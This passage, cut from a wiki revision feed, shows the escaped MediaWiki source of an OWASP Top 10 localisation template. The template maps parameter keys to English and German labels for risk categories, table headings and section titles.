        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Broken Authentication and Session Management&lt;br /&gt;
        | authentication =                Authentication &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Insecure Direct Object References&lt;br /&gt;
        | insecureDOR =                   Insecure DOR&lt;br /&gt;
        | securityMisconfig =             Security Misconfiguration&lt;br /&gt;
        | misconfig =                     Misconfig&lt;br /&gt;
        | sensitiveDataExposure =         Sensitive Data Exposure&lt;br /&gt;
        | sensData =                      Sens. Data&lt;br /&gt;
        | missingFunctionLevelACL =       Missing Function Level Access Control&lt;br /&gt;
        | functionAcc =                   Function Acc.&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Using Components with Known Vulnerabilities&lt;br /&gt;
        | vulnComponents =                vuln. Components&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Unvalidated Redirects and Forwards&lt;br /&gt;
        | unvalRedirects =                unval. Redirects&lt;br /&gt;
        | insecureCryptographicStorage =  Insecure Cryptographic Storage&lt;br /&gt;
        | failureRestrictUrlAccess =      Failure to Restrict URL Access&lt;br /&gt;
        | insufficientTLProtection =      Insufficient Transport Layer Protection&lt;br /&gt;
        | brokenAccessControl =           Broken Access Control &lt;br /&gt;
        | insufficientAttackPrevention =  Insufficient Attack Protection &lt;br /&gt;
        | underprotectedAPIs =            Underprotected APIs&lt;br /&gt;
        | accessCtrl =                    Access Ctrl&lt;br /&gt;
        | attackProt  =                   Attack Prot.&lt;br /&gt;
        | ApiProt =                       API Prot.&lt;br /&gt;
        | inProgress =                    In Progress &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Application Specific&lt;br /&gt;
        | appSpecific =                   App Specific&lt;br /&gt;
        | applicationBusinessSpecific =   Application / Business Specific  &lt;br /&gt;
        | appBusinessSpecific =           App / Business Specific       &lt;br /&gt;
        | exploitability =                Exploitability&lt;br /&gt;
        | easy =                          EASY&lt;br /&gt;
        | average =                       AVERAGE&lt;br /&gt;
        | difficult =                     DIFFICULT&lt;br /&gt;
        | weakness =                      Weakness &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt; &lt;br /&gt;
        | prevalence =                    Prevalence&lt;br /&gt;
        | veryWidespread =                VERY WIDESPREAD&lt;br /&gt;
        | widespread =                    WIDESPREAD&lt;br /&gt;
        | common =                        COMMON&lt;br /&gt;
        | uncommon =                      UNCOMMON&lt;br /&gt;
        | detectability =                 Detectability&lt;br /&gt;
        | impact =                        Impact&lt;br /&gt;
        | severe =                        SEVERE&lt;br /&gt;
        | moderate =                      MODERATE&lt;br /&gt;
        | minor =                         MINOR &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Threat Agents&lt;br /&gt;
        | attackVectors =                 Attack Vectors&lt;br /&gt;
        | securityWeakness =              Security Weakness&lt;br /&gt;
        | technicalImpacts =              Technical Impacts&lt;br /&gt;
        | businessImpacts =               Business Impacts&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 businessImpacts.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top_10_2013-appsec-risks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Am I Vulnerable To {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | vulnerableTo1 =                 Am I Vulnerable To&lt;br /&gt;
        | vulnerableTo2 =                 ?&lt;br /&gt;
        | howPrevent =                    How Do I Prevent {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | howPrevent1 =                   How Do I Prevent&lt;br /&gt;
        | howPrevent2 =                   ?&lt;br /&gt;
        | exampleScenarios =              Example Attack Scenarios &lt;br /&gt;
        | defendingOption =               Defending Option&lt;br /&gt;
        | against =                       against&lt;br /&gt;
        | userImpact =                    Impact to the User &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      External &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      ERROR in the 'Language File' (Use of the unused Object)&lt;br /&gt;
        | #default =                      ERROR in the 'Language File' (Use of an unknown Object)&lt;br /&gt;
     }} &amp;lt;!-- End of English --&amp;gt;&lt;br /&gt;
}}&amp;lt;/onlyinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232190</id>
		<title>Template:Top 10:LanguageFile</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232190"/>
				<updated>2017-08-11T19:11:21Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!----------------------------------------------------------------------------&amp;gt; &lt;br /&gt;
&amp;lt;!-- This File contains all the text that is used by OWASP Top 10 Templates --&amp;gt;&lt;br /&gt;
&amp;lt;!--             Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;!----------------------------------------------------------------------------&amp;gt;&lt;br /&gt;
==='''Usage:''' ===&lt;br /&gt;
This File contains all the text that is used by OWASP Top 10 Templates&amp;lt;br/&amp;gt;&lt;br /&gt;
Please leave a message to {{Template:Contact | name = Torsten Gigler | email =torsten.gigler@owasp.org | username = T.Gigler}} &lt;br /&gt;
if you liked to add a new localization&amp;lt;br&amp;gt;                     &lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
If you use an undefined language you will get English output (default language).&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |text=&amp;lt;parameter&amp;gt; &amp;lt;!-- take one of the defined parmeters, e.g. tableOfContents --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |language=&amp;lt;your language&amp;gt;   &amp;lt;!-- actually only English (=en) and German (=de) are valid parameters) --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |year=&amp;lt;year&amp;gt;   &amp;lt;!-- optional for some texts --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;}}&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
====Example:====&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile|text=tableOfContents|language=de}} =&amp;gt;&amp;lt;/nowiki&amp;gt; {{Top_10:LanguageFile|text=tableOfContents|language=de}}&lt;br /&gt;
----&lt;br /&gt;
==='''Healthcheck'''===&lt;br /&gt;
tbd.&amp;lt;br/&amp;gt;&lt;br /&gt;
In the meantime, please check:&lt;br /&gt;
* [[Top_10_2013-Table_of_Contents | English Top 10 Wiki]]&lt;br /&gt;
* [[Germany/Projekte/Top_10-2013-Inhaltsverzeichnis | German Top 10 Wiki]]&lt;br /&gt;
----&lt;br /&gt;
If you use an unknown parameter you will get the following Error message in your wiki page:&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt;{{#switch: {{{language}}}&lt;br /&gt;
   | de = &amp;lt;!-- German --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Germany/Projekte/Top 10-{{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Germany/Projekte/Top 10 fuer Entwickler-{{{year}}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage =               ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10-2013==&lt;br /&gt;
        | top10TmpMessageDeveloperEdition = ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10 fuer Entwickler-2013==&lt;br /&gt;
        | centerLink1 =                   [[Germany/Projekte/Top 10-2013-Inhaltsverzeichnis|2013 Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2 =                   [[Germany/Projekte/Top 10-2013-Top 10|2013 Die Top-10-Risiken]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Inhaltsverzeichnis|Top 10 fuer Entwickler-2013: Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Top 10|Die Top-10-Risiken]]&lt;br /&gt;
        | projectCategory =               [[Category: Germany/Projekte/Top 10-2013]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top 10 fuer Entwickler]] [[Category: Germany/Projekte/Top 10 fuer Entwickler-2013]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for Top 10 2013-CenterLinkTemplate --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Inhaltsverzeichnis&lt;br /&gt;
        | foreword =                      Vorwort&lt;br /&gt;
        | forewordTranslation =           Vorwort der deutschen Übersetzung&lt;br /&gt;
        | forward =                       Vorwort &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Vorwort der deutschen Übersetzung &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    Über OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright und Lizenz&lt;br /&gt;
        | introduction =                  Einleitung&lt;br /&gt;
        | releaseNotes =                  Neuerungen&lt;br /&gt;
        | risks =                         Risiken&lt;br /&gt;
        | risk =                          Risiko&lt;br /&gt;
        | subTitleApplicationRisks =      (Sicherheitsrisiken für Anwendungen)&lt;br /&gt;
        | riskLarge =                     RISIKO&lt;br /&gt;
        | applicationSecurityRisks =      Was sind Sicherheitsrisiken für Anwendungen? &lt;br /&gt;
        | theTop10 =                      Die Top-10-Risiken&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        Nächste Schritte für Software-Entwickler&lt;br /&gt;
        | whatsNextforVerifiers =         Nächste Schritte für Prüfer&lt;br /&gt;
        | whatsNextforOrganizations =     Nächste Schritte für Organisationen&lt;br /&gt;
        | noteAboutRisks =                Anmerkungen zum Risikobegriff&lt;br /&gt;
        | detailsAboutRiskFactors =       Details zu Risiko-Faktoren&lt;br /&gt;
        | appendix =                      Anlage&lt;br /&gt;
        | warnings =                      Zur Beachtung&lt;br /&gt;
        | acknowledgements =              Danksagung&lt;br /&gt;
        | attribution =                   Namensnennung/Danksagung&lt;br /&gt;
        | whatChangedFrom2010to2013 =     Was hat sich von Version 2010 zu 2013 verändert?&lt;br /&gt;
        | welcome =                       Herzlich Willkommen&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          Was sind Sicherheitsrisiken für Anwendungen?&lt;br /&gt;
        | whatsMyRisk =                   Was sind &amp;lt;u&amp;gt;meine&amp;lt;/u&amp;gt; Risiken?&lt;br /&gt;
        | references =                    Referenzen&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Etablierung und Nutzung umfassender Sicherheitsmaßnahmen&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Starten Sie jetzt mit Ihrem Anwendungssicherheits-Programm!&lt;br /&gt;
        | getOrganized =                  Organisation und Prozesse &lt;br /&gt;
        | codeReview =                    Code-Analyse&lt;br /&gt;
        | securityAndPenetrationTesting = Sicherheits- und Penetrationstests&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    Es geht nicht um Schwachstellen, sondern um Risiken&lt;br /&gt;
        | top10RiskFactorSummary =        Zusammenfassung der Top 10 Risiko-Faktoren&lt;br /&gt;
        | additionalRisksToConsider =     Weitere zu betrachtende Risiken &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Fehler in Authentifizierung und Session-Management&lt;br /&gt;
        | authentication =                Authentifizierung &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Unsichere direkte Objektreferenzen&lt;br /&gt;
        | insecureDOR =                   Unsichere direkte Objektreferenzen&lt;br /&gt;
        | securityMisconfig =             Sicherheitsrelevante Fehlkonfiguration&lt;br /&gt;
        | misconfig =                     Fehlkonfiguration&lt;br /&gt;
        | sensitiveDataExposure =         Verlust der Vertraulichkeit sensibler Daten&amp;lt;noinclude&amp;gt;ex: Sensitive Data Exposure&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | sensData =                      Sens. Data&amp;lt;noinclude&amp;gt;(tbd)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | missingFunctionLevelACL =       Fehlerhafte Autorisierung auf Anwendungsebene &amp;lt;noinclude&amp;gt;(tbd = Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | functionAcc =                   Fehlerh. Autorisierung&amp;lt;noinclude&amp;gt;(tbd = Kurzform für Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Benutzen von Komponenten mit bekannten Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = Using Components with Known Vulnerabilities)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnComponents =                Komponenten mit Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = vuln. Components)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Ungeprüfte Um- und Weiterleitungen&lt;br /&gt;
        | unvalRedirects =                Ungepr. Weiterltg.&lt;br /&gt;
        | insecureCryptographicStorage =  Kryptografisch unsichere Speicherung&lt;br /&gt;
        | failureRestrictUrlAccess =      Mangelhafter URL-Zugriffsschutz&lt;br /&gt;
        | insufficientTLProtection =      Unzureichende Absicherung der Transportschicht&lt;br /&gt;
        | inProgress =                    In Arbeit &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Anwendungs-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | appSpecific =                   Anw.-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | applicationBusinessSpecific =   Anwendungs-/&amp;lt;br&amp;gt;Geschäftsspezifisch&lt;br /&gt;
        | appBusinessSpecific =           Anw.-/&amp;lt;br&amp;gt;Geschäftsspez. &lt;br /&gt;
        | exploitability =                Ausnutzbarkeit&lt;br /&gt;
        | easy =                          EINFACH&lt;br /&gt;
        | average =                       DURCHSCHNITTLICH&lt;br /&gt;
        | difficult =                     SCHWIERIG&lt;br /&gt;
        | weakness =                      &amp;lt;!-- not used ---&amp;gt; &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt;&lt;br /&gt;
        | prevalence =                    Verbreitung&lt;br /&gt;
        | veryWidespread =                AUSSERGEWÖHNLICH HÄUFIG&lt;br /&gt;
        | widespread =                    SEHR HÄUFIG&lt;br /&gt;
        | common =                        HÄUFIG&lt;br /&gt;
        | uncommon =                      SELTEN&lt;br /&gt;
        | detectability =                 Auffindbarkeit&lt;br /&gt;
        | impact =                        Auswirkung&lt;br /&gt;
        | severe =                        SCHWERWIEGEND&lt;br /&gt;
        | moderate =                      MITTEL&lt;br /&gt;
        | minor =                         GERING  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Bedrohungsquelle&lt;br /&gt;
        | attackVectors =                 Angriffsvektor&lt;br /&gt;
        | securityWeakness =              Schwachstellen&lt;br /&gt;
        | technicalImpacts =              Technische Auswirkung&lt;br /&gt;
        | businessImpacts =               Auswirkung auf das Unternehmen&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 de threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 de attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 de securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 de technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 de businessImpacts.png  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top 10 de ApplicationSecurityRisks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt;          &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Bin ich durch {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verwundbar?&lt;br /&gt;
        | vulnerableTo1 =                 Bin ich durch&lt;br /&gt;
        | vulnerableTo2 =                 &amp;amp;nbsp;verwundbar?&lt;br /&gt;
        | howPrevent =                    Wie kann ich {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verhindern?&lt;br /&gt;
        | howPrevent1 =                   Wie kann ich &lt;br /&gt;
        | howPrevent2 =                   &amp;amp;nbsp;verhindern?&lt;br /&gt;
        | exampleScenarios =              Mögliche Angriffsszenarien &lt;br /&gt;
        | defendingOption =               Verteidigungs-Option&lt;br /&gt;
        | against =                       gegen&lt;br /&gt;
        | userImpact =                    Auswirkung(en) auf den Benutzer &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;   &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;         &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      Andere                    &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;   &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      FEHLER im 'Language File' (Aufruf des unbenutzten Objekts)&lt;br /&gt;
        | #default =                      FEHLER im 'Language File' (Aufruf des unbekannten Objekts)&lt;br /&gt;
     }} &amp;lt;!-- End of German --&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&amp;lt;!-- English = default; so here is nothing to do --&amp;gt; &lt;br /&gt;
&amp;lt;!-- | en =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | us =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | gb =  --&amp;gt;&lt;br /&gt;
&amp;lt;/noinclude&amp;gt; | #default = &amp;lt;!-- English --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Top 10 {{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Top 10 {{{year}}} Developer Edition&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage = &lt;br /&gt;
           {{#switch: {{{year}}} &lt;br /&gt;
             | 2017 =               ==This page is outdated. It is part of the Top 10-2017 RC1 which has been rejected.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;==If you wish to comment, please file an [https://github.com/OWASP/Top10/issues issue on GitHub]. Changes to this page will be lost!==&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;==More information available [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2017_Release_Candidate_1 here]].==&lt;br /&gt;
             | 2013 =               &amp;lt;noinclude&amp;gt;==The Top 10-2013 Wiki is under Construction. The Content is Not Finished yet==&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
           }}&lt;br /&gt;
        | top10TmpMessageDeveloperEdition =   ==The Top 10-2013 Developer Edition Wiki is under Connstruction. The Content is Not Finished yet==&lt;br /&gt;
        | centerLink1 =                   [[Top 10 {{{year}}}-Table of Contents | {{{year}}} Table of Contents]]&lt;br /&gt;
        | centerLink2 =                   [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Table of Contents|{{{year}}} Developer Edition-Table of Contents]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Top 10 List|{{{year}}} Developer Edition-Top 10 List]]&lt;br /&gt;
        | projectCategory =               [[Category:OWASP Top Ten Project]] [[Category:OWASP Top Ten {{{year}}} Project]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top Ten {{{year}}} Developer Edition]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Table of Contents&lt;br /&gt;
        | foreword =                      Foreword&lt;br /&gt;
        | forewordTranslation =           Foreword of the English Wiki&lt;br /&gt;
        | forward =                       Forward &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Forward of the English Wiki &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    About OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright and License&lt;br /&gt;
        | introduction =                  Introduction&lt;br /&gt;
        | releaseNotes =                  Release Notes&lt;br /&gt;
        | risks =                         Risks&lt;br /&gt;
        | risk =                          Risk&lt;br /&gt;
        | subTitleApplicationRisks =      (Application Security Risks)&lt;br /&gt;
        | riskLarge =                     RISIK&lt;br /&gt;
        | applicationSecurityRisks =      Application Security Risks&lt;br /&gt;
        | theTop10 =                      The Top 10&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        What's Next for Developers&lt;br /&gt;
        | whatsNextforVerifiers =         What's Next for Verifiers&lt;br /&gt;
        | whatsNextforSecurityTesting =   What's Next for Security Testing&lt;br /&gt;
        | whatsNextforOrganizations =     What's Next for Organizations&lt;br /&gt;
        | noteAboutRisks =                Note About Risks&lt;br /&gt;
        | OWASPTop10ApplicationSecurityRisks = OWASP Top 10 Application Security Risks&lt;br /&gt;
        | detailsAboutRiskFactors =       Details About Risk Factors&lt;br /&gt;
        | appendix =                      appendix&lt;br /&gt;
        | warnings =                      Warnings&lt;br /&gt;
        | acknowledgements =              Acknowledgements&lt;br /&gt;
        | attribution =                   Attribution&lt;br /&gt;
        | whatChangedFrom2010to2013 =     What Changed From 2010 to 2013?&lt;br /&gt;
        | welcome =                       Welcome&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          What Are Application Security Risks?&lt;br /&gt;
        | whatsMyRisk =                   What's My Risk?&lt;br /&gt;
        | references =                    References&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Establish &amp;amp; Use Repeatable Security Processes and Standard Security Controls&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Start Your Application Security Program Now&lt;br /&gt;
        | establishContinuousApplicationSecurityTesting = Establish Continuous Application Security Testing&lt;br /&gt;
        | getOrganized =                  Get Organized&lt;br /&gt;
        | codeReview =                    Code Review&lt;br /&gt;
        | securityAndPenetrationTesting = Security and Penetration Testing&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    It's About Risks, Not Weaknesses&lt;br /&gt;
        | top10RiskFactorSummary =        Top 10 Risk Factor Summary&lt;br /&gt;
        | additionalRisksToConsider =     Additional Risks to Consider  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Broken Authentication and Session Management&lt;br /&gt;
        | authentication =                Authentication &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Insecure Direct Object References&lt;br /&gt;
        | insecureDOR =                   Insecure DOR&lt;br /&gt;
        | securityMisconfig =             Security Misconfiguration&lt;br /&gt;
        | misconfig =                     Misconfig&lt;br /&gt;
        | sensitiveDataExposure =         Sensitive Data Exposure&lt;br /&gt;
        | sensData =                      Sens. Data&lt;br /&gt;
        | missingFunctionLevelACL =       Missing Function Level Access Control&lt;br /&gt;
        | functionAcc =                   Function Acc.&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Using Components with Known Vulnerabilities&lt;br /&gt;
        | vulnComponents =                vuln. Components&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Unvalidated Redirects and Forwards&lt;br /&gt;
        | unvalRedirects =                unval. Redirects&lt;br /&gt;
        | insecureCryptographicStorage =  Insecure Cryptographic Storage&lt;br /&gt;
